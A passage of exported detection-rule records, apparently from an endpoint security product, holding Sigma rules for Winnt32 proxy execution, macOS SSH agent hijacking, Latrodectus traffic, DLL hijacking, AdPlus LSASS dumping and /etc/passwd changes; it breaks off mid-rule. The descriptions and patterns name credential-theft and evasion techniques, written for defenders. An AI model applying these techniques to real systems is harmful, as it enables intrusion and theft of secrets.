"references": [
"https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winnt32",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_winnt32.yml",
"content": "title: Suspicious Winnt32.exe Execution\nid: 6519f41d-2b23-494d-b1c5-dee52a5166d5\ndescription: |\n Detects a suspicious execution of Winnt32.exe, possibly to proxy the execution of malicious code.\n This binary, which is digitally signed by Microsoft, can be used to execute commands.\n Winnt32 is an administrative tool only found on Windows Server 2003, Windows NT, Windows 2000 or XP workstations.\n Attackers may abuse it to bypass security restrictions.\n It is recommended to investigate the legitimacy of the process responsible for the execution of Winnt32.exe, investigate its command-line arguments and to analyze child processes.\nreferences:\n - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/winnt32\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/04\nmodified: 2025/03/31\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.ProxyExecution\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n - OriginalFileName: 'Winnt32.exe'\n - Image|endswith: '\\Winnt32.exe'\n\n selection_commandline:\n CommandLine|contains: '/cmd'\n\n condition: selection and selection_commandline\nlevel: medium\n#level: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6519f41d-2b23-494d-b1c5-dee52a5166d5",
"rule_name": "Suspicious Winnt32.exe Execution",
"rule_description": "Detects a suspicious execution of Winnt32.exe, possibly to proxy the execution of malicious code.\nThis binary, which is digitally signed by Microsoft, can be used to execute commands.\nWinnt32 is an administrative tool only found on Windows Server 2003, Windows NT, Windows 2000 or XP workstations.\nAttackers may abuse it to bypass security restrictions.\nIt is recommended to investigate the legitimacy of the process responsible for the execution of Winnt32.exe, investigate its command-line arguments and to analyze child processes.\n",
"rule_creation_date": "2022-12-04",
"rule_modified_date": "2025-03-31",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "654df237-1938-4361-b96b-0ddec4e682c1",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.617529Z",
"creation_date": "2026-03-23T11:45:34.617530Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.617535Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/",
"https://attack.mitre.org/techniques/T1563/001/"
],
"name": "t1563_001_ssh_session_hijacking_macos.yml",
"content": "title: SSH Session Hijacking (macOS)\nid: 654df237-1938-4361-b96b-0ddec4e682c1\ndescription: |\n Detects the execution of the ssh binary with the SSH_AUTH_SOCKET variable being set to an ssh-agent UNIX socket in the command-line.\n Attackers may use this to query SSH Agent sockets of other users or services and leverage private keys for which they did not have access.\n It is recommended to investigate any traces of compromise in the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\nreferences:\n - https://embracethered.com/blog/posts/2022/ttp-diaries-ssh-agent-hijacking/\n - https://attack.mitre.org/techniques/T1563/001/\ndate: 2024/03/04\nmodified: 2025/01/20\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1563.001\n - classification.macOS.Source.ProcessCreation\n - classification.macOS.Behavior.Lateralization\n - classification.macOS.Behavior.Hijacking\nlogsource:\n category: process_creation\n product: macos\ndetection:\n selection:\n CommandLine|contains:\n - 'SSH_AUTH_SOCK=/tmp/ssh-????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-?????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-??????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-???????????/agent'\n - 'SSH_AUTH_SOCK=/tmp/ssh-????????????/agent'\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "654df237-1938-4361-b96b-0ddec4e682c1",
"rule_name": "SSH Session Hijacking (macOS)",
"rule_description": "Detects the execution of the ssh binary with the SSH_AUTH_SOCK variable being set to an ssh-agent UNIX socket in the command-line.\nAttackers may use this to query SSH Agent sockets of other users or services and leverage private keys to which they did not have access.\nIt is recommended to investigate any traces of compromise on the machine where this SSH connection began, and to closely monitor the target machine to determine if the connection is malicious.\n",
"rule_creation_date": "2024-03-04",
"rule_modified_date": "2025-01-20",
"rule_os": "macos",
"rule_status": null,
"rule_tactic_tags": [
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1563.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "655d3bee-dba6-4ac6-b36a-87197f63b083",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "critical",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603678Z",
"creation_date": "2026-03-23T11:45:34.603682Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603689Z",
"rule_level": "critical",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitsight.com/blog/latrodectus-are-you-coming-back",
"https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus",
"https://attack.mitre.org/software/S1160/"
],
"name": "t1071_001_latrodectus_url_request.yml",
"content": "title: URL Request Related to Latrodectus\nid: 655d3bee-dba6-4ac6-b36a-87197f63b083\ndescription: |\n Detects URL requests with a specific User-Agent associated with the Latrodectus malware.\n Latrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\n It is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\nreferences:\n - https://www.bitsight.com/blog/latrodectus-are-you-coming-back\n - https://www.elastic.co/security-labs/spring-cleaning-with-latrodectus\n - https://attack.mitre.org/software/S1160/\ndate: 2025/08/13\nmodified: 2025/09/18\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1071.001\n - attack.t1132.001\n - attack.t1573.001\n - attack.exfiltration\n - attack.t1041\n - attack.s1160\n - classification.Windows.Source.UrlRequest\n - classification.Windows.Trojan.Latrodectus\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.Exfiltration\nlogsource:\n product: windows\n category: url_request\ndetection:\n selection:\n UserAgent: 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)'\n\n condition: selection\nlevel: critical\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "655d3bee-dba6-4ac6-b36a-87197f63b083",
"rule_name": "URL Request Related to Latrodectus",
"rule_description": "Detects URL requests with a specific User-Agent associated with the Latrodectus malware.\nLatrodectus is a sophisticated malware loader serving as a successor to IcedID with capabilities including payload delivery, reconnaissance, and evasion techniques.\nIt is recommended to investigate the request performed by the process to determine its legitimacy as well as the context around this alert to look for malicious actions.\n",
"rule_creation_date": "2025-08-13",
"rule_modified_date": "2025-09-18",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.exfiltration"
],
"rule_technique_tags": [
"attack.t1041",
"attack.t1071.001",
"attack.t1132.001",
"attack.t1573.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "6575df79-0fcb-4da3-b753-94ba6fb5b878",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.087778Z",
"creation_date": "2026-03-23T11:45:34.087780Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.087784Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_upgraderesultsui.yml",
"content": "title: DLL Hijacking via upgraderesultsui.exe\nid: 6575df79-0fcb-4da3-b753-94ba6fb5b878\ndescription: |\n Detects potential Windows DLL Hijacking via upgraderesultsui.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers used this technique by copying legitimate Windows signed executable from System32 or SysWow64 to a non-standard directory and plant the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'upgraderesultsui.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\DMCmnUtils.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "6575df79-0fcb-4da3-b753-94ba6fb5b878",
"rule_name": "DLL Hijacking via upgraderesultsui.exe",
"rule_description": "Detects potential Windows DLL Hijacking via upgraderesultsui.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWow64 to a non-standard directory and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "657e2e2c-ab6b-474c-a1c3-0c845ab605c0",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.086017Z",
"creation_date": "2026-03-23T11:45:34.086019Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.086023Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/",
"https://attack.mitre.org/techniques/T1218/",
"https://attack.mitre.org/techniques/T1127/",
"https://attack.mitre.org/techniques/T1003/001/"
],
"name": "t1127_adplus_execution_for_proxy_or_dump.yml",
"content": "title: Suspicious AdPlus Execution\nid: 657e2e2c-ab6b-474c-a1c3-0c845ab605c0\ndescription: |\n Detects the suspicious execution of the Adplus.exe development binary.\n Adplus.exe is a legitimate binary used as a developer tool and can be abused by attackers in order to proxy the execution of malicious payloads or dump the memory of processes (such as LSASS').\n It is recommended to analyze the process responsible for the execution of Adplus.exe to determine if it is being used in a legitimate software development context.\nreferences:\n - https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/\n - https://attack.mitre.org/techniques/T1218/\n - https://attack.mitre.org/techniques/T1127/\n - https://attack.mitre.org/techniques/T1003/001/\ndate: 2022/06/10\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1127\n - attack.credential_access\n - attack.t1003.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Adplus\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.CredentialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'adplus.exe'\n\n selection_config:\n CommandLine|contains:\n - ' -c '\n - ' /c '\n\n selection_mode:\n CommandLine:\n - '* -hang *'\n - '* /hang *'\n - '* -crash *'\n - '* /crash *'\n CommandLine|contains:\n - ' -sc '\n - ' /sc '\n - ' -p '\n - ' /p '\n - ' -pn '\n - ' /pn '\n - ' -po '\n - ' /po '\n - ' -pmn '\n - ' /pmn '\n condition: selection and 1 of selection_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "657e2e2c-ab6b-474c-a1c3-0c845ab605c0",
"rule_name": "Suspicious AdPlus Execution",
"rule_description": "Detects the suspicious execution of the Adplus.exe development binary.\nAdplus.exe is a legitimate binary used as a developer tool and can be abused by attackers in order to proxy the execution of malicious payloads or dump the memory of processes (such as LSASS').\nIt is recommended to analyze the process responsible for the execution of Adplus.exe to determine if it is being used in a legitimate software development context.\n",
"rule_creation_date": "2022-06-10",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.credential_access",
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1003.001",
"attack.t1127",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65a8b26d-fbd9-480c-8dec-bba6a1cdff90",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.586623Z",
"creation_date": "2026-03-23T11:45:34.586627Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.586634Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://securityintelligence.com/posts/windows-features-dll-sideloading/",
"https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/",
"https://hijacklibs.net/entries/microsoft/external/outllib.html",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_finder.yml",
"content": "title: DLL Hijacking via finder.exe\nid: 65a8b26d-fbd9-480c-8dec-bba6a1cdff90\ndescription: |\n Detects potential Windows DLL Hijacking via finder.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://securityintelligence.com/posts/windows-features-dll-sideloading/\n - https://www.welivesecurity.com/2020/12/02/turla-crutch-keeping-back-door-open/\n - https://hijacklibs.net/entries/microsoft/external/outllib.html\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2022/11/28\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'finder.exe'\n ProcessSignature: 'Microsoft Corporation'\n ImageLoaded|endswith: '\\outllib.dll'\n\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Program Files\\Microsoft Office\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Program Files\\Microsoft Office\\Office*\\'\n - '?:\\Program Files (x86)\\Microsoft Office\\Office*\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\WinSxS\\'\n\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "65a8b26d-fbd9-480c-8dec-bba6a1cdff90",
"rule_name": "DLL Hijacking via finder.exe",
"rule_description": "Detects potential Windows DLL Hijacking via finder.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate executable and planting the malicious DLL within the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2022-11-28",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "65a8fa3a-06de-4ca1-b3dd-64deb561fc8d",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "moderate",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.622230Z",
"creation_date": "2026-03-23T11:45:34.622232Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.622236Z",
"rule_level": "high",
"rule_confidence": "moderate",
"rule_confidence_override": null,
"references": [
"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md",
"https://attack.mitre.org/techniques/T1003/008/",
"https://attack.mitre.org/techniques/T1078/"
],
"name": "t1003_008_etc_passwd_modified.yml",
"content": "title: File /etc/passwd Modified\nid: 65a8fa3a-06de-4ca1-b3dd-64deb561fc8d\ndescription: |\n Detects a suspicious attempt to modify /etc/passwd.\n This file contains every registered user that has access to the system, and can be modified to add new accounts.\n It is recommended to ensure that both the process modifying this file and the user that requested the creation of a new user are legitimate.\nreferences:\n - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1003.008/T1003.008.md\n - https://attack.mitre.org/techniques/T1003/008/\n - https://attack.mitre.org/techniques/T1078/\ndate: 2023/01/13\nmodified: 2026/01/21\nauthor: HarfangLab\ntags:\n - attack.credential_access\n - attack.t1003.008\n - attack.persistence\n - attack.privilege_escalation\n - attack.initial_access\n - attack.t1078\n - classification.Linux.Source.Filesystem\n - classification.Linux.Behavior.CredentialAccess\n - classification.Linux.Behavior.Persistence\n - classification.Linux.Behavior.AccountManipulation\nlogsource:\n category: filesystem_event\n product: linux\ndetection:\n selection:\n - Path: '/etc/passwd'\n - TargetPath: '/etc/passwd'\n filter_read_access:\n Kind: 'access'\n Permissions: 'read'\n\n exclusion_common:\n ProcessImage:\n - '*/systemd'\n - '*/sudo'\n - '*/su'\n - '*/sshd'\n - '*/cron'\n - '*/unix_chkpwd'\n - '*/accountsservice/accounts-daemon'\n - '*/passwd'\n - '*/usermod'\n - '*/useradd'\n - '*/chage'\n - '*/userdel'\n - '*/kaniko/executor'\n - '/usr/bin/chfn'\n - '/usr/sbin/groupmod'\n - '/usr/sbin/chpasswd'\n - '/bin/chmod'\n - '/bin/adduser'\n - '/usr/bin/podman'\n - '/usr/bin/ln'\n - '/usr/bin/chsh'\n - '/usr/sbin/pwck'\n - '/usr/bin/systemd-sysusers'\n - '/usr/lib/x86_64-linux-gnu/guix/guile'\n\n exclusion_images:\n ProcessImage:\n - '/usr/bin/skopeo'\n - '/gnu/store/*/bin/guile'\n\n exclusion_dpkg:\n - ProcessImage: '/usr/bin/dpkg'\n - ProcessParentImage: '/usr/bin/dpkg'\n - ProcessGrandparentImage: '/usr/bin/dpkg'\n 
exclusion_dpkg_cmds_bin:\n - ProcessCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/bin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/dpkg-'\n exclusion_dpkg_cmds_sbin:\n - ProcessCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessParentCommandLine|contains: '/usr/sbin/dpkg-'\n - ProcessGrandparentCommandLine|contains: '/usr/sbin/dpkg-'\n exclusion_apt:\n - ProcessImage: '/usr/bin/apt'\n - ProcessParentImage: '/usr/bin/apt'\n - ProcessGrandparentImage: '/usr/bin/apt'\n exclusion_debconf:\n - ProcessCommandLine|contains: '/usr/bin/debconf'\n - ProcessParentCommandLine|contains: '/usr/bin/debconf'\n - ProcessGrandparentCommandLine|contains: '/usr/bin/debconf'\n exclusion_dpkg_postinstall:\n - ProcessCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessParentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n - ProcessGrandparentCommandLine|contains: '/var/lib/dpkg/info/*.postinst configure'\n exclusion_cmp:\n ProcessCurrentDirectory|startswith: '/var/backups/'\n ProcessImage|endswith: '/cmp'\n ProcessParentName: 'passwd'\n ProcessGrandparentImage|endswith: '/run-parts'\n exclusion_yum:\n - ProcessCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessParentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n - ProcessGrandparentCommandLine|startswith:\n - '/usr/bin/python* /bin/yum '\n - '/usr/bin/python* /usr/bin/yum '\n - '/usr/bin/python* /usr/sbin/yum-cron'\n - '/usr/libexec/platform-python /bin/yum '\n - '/usr/libexec/platform-python /usr/bin/yum '\n exclusion_dnf:\n ProcessCommandLine|startswith:\n - 
'/usr/libexec/platform-python /bin/dnf '\n - '/usr/libexec/platform-python /usr/bin/dnf '\n - '/usr/libexec/platform-python /bin/dnf-automatic '\n - '/usr/libexec/platform-python /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf-automatic '\n - '/usr/bin/python? /usr/bin/dnf-automatic'\n - '/usr/bin/python? /bin/dnf '\n - '/usr/bin/python? /usr/bin/dnf '\n - '/usr/bin/python?.? /bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf '\n - '/usr/bin/python?.? /usr/bin/dnf-automatic'\n\n exclusion_busybox_general:\n ProcessImage: '/bin/busybox'\n ProcessCommandLine:\n - 'chpasswd'\n - 'adduser *'\n - 'passwd*' # passwd and passwd XXX\n - 'deluser *'\n\n exclusion_docker:\n - ProcessImage:\n - '/usr/bin/dockerd'\n - '/usr/sbin/dockerd'\n - '/usr/local/bin/dockerd'\n - '/usr/local/bin/docker-init'\n - '/usr/bin/dockerd-current'\n - '/usr/sbin/dockerd-current'\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd'\n - '/var/lib/rancher/rke2/data/*/bin/containerd'\n - '/var/lib/rancher/k3s/data/*/bin/containerd-shim-runc-v2'\n - '/var/lib/rancher/rke2/data/*/bin/containerd-shim-runc-v2'\n - '/snap/docker/*/bin/dockerd'\n - '/snap/microk8s/*/bin/containerd'\n - '/usr/bin/dockerd-ce'\n - '/nix/store/*-docker-containerd-*/bin/containerd'\n - ProcessAncestors|contains:\n - '|/usr/bin/dockerd|'\n - '/k3s/data/*/bin/containerd-shim-runc-v2|'\n - '/rke2/data/*/bin/containerd-shim-runc-v2|'\n\n exclusion_docker2:\n ProcessImage|endswith: '/bin/dockerd'\n ProcessCommandLine: 'docker-applyLayer *'\n\n exclusion_containerd:\n - ProcessParentImage:\n - '/usr/bin/containerd'\n - '/usr/local/bin/containerd-shim-runc-v2'\n - ProcessAncestors|contains:\n - '|/usr/bin/containerd|'\n - '|/usr/bin/containerd-shim-runc-v2|'\n\n exclusion_rootlesskit:\n # /home//bin/rootlesskit --state-dir=/run/user/1022/dockerd-rootless --net=slirp4netns --mtu=65520 --slirp4netns-sandbox=auto --slirp4netns-seccomp=auto --disable-host-loopback 
